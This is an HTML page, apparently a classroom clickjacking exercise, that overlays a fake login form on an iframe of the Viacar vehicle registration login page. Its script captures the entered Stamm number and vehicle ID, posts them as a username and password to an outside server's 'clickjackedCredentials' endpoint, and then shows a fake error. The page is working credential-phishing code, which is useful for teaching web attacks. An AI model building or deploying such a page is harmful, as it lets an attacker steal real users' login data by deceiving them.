<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Viacar Online Dispo</title>
    <link rel="stylesheet" href="style.css">
</head>
<body>

<div style="display: none;" id="errorMessage">
    <p>
        Entschuldige! Etwas ist fehlgeschlagen. Bitte versuchen Sie es
        <a href="https://www.viacar.ch/dispo/Login/LoginFzPruefung.aspx?Kanton=ZH">erneut</a>.
    <p>
</div>

<div id="page-content">
    <form id="fake-form">
        <input type="text" id="stammNr" class="stamm_nr">
        <span class="span_input"></span>
        <input type="text" id="fid1">
        <input type="text" id="fid2">
        <input type="text" id="fid3">
        <span class="span_button"></span>
        <button type="submit">Login</button>
    </form>
</div>

<iframe id="frame" src="https://www.viacar.ch/dispo/Login/LoginFzPruefung.aspx?Kanton=ZH"></iframe>

<script type="text/javascript">
    let frameSrc = getElemById("frame").getAttribute('src')
    let dataTemplate = {
            "source": frameSrc,
            "username": "",
            "password": ""
    }

    getElemById("fake-form").addEventListener("submit", function (e) {
        // read form data
        let stammNr = getElemById("stammNr").value;
        let fid = getElemById("fid1").value + "-" + getElemById("fid2").value + "-" + getElemById("fid3").value

        // send enterd data
        postCredentials(stammNr, fid);

        // show fake error message
        getElemById("errorMessage").style.display = "block";
        getElemById("page-content").style.display = "none";
        e.preventDefault()

        // optional to redirect to real page
        // window.location.href = "https://www.viacar.ch/dispo/Login/LoginFzPruefung.aspx?Kanton=ZH"
    });

    function postCredentials(username, password) {
        dataTemplate["username"] = username;
        dataTemplate["password"] = password;
        return fetch('https://m183.gibz-informatik.ch/api/clickjackedCredentials', {
            method: 'POST',
            mode: 'cors',
            headers: { 'Content-Type': 'application/json'},
            body: JSON.stringify(dataTemplate)
        })
        .then(response => response.json());
        console.log(response)
    }

    function getElemById(id) {
        return document.getElementById(id);
    }
</script>

</body>
</html>
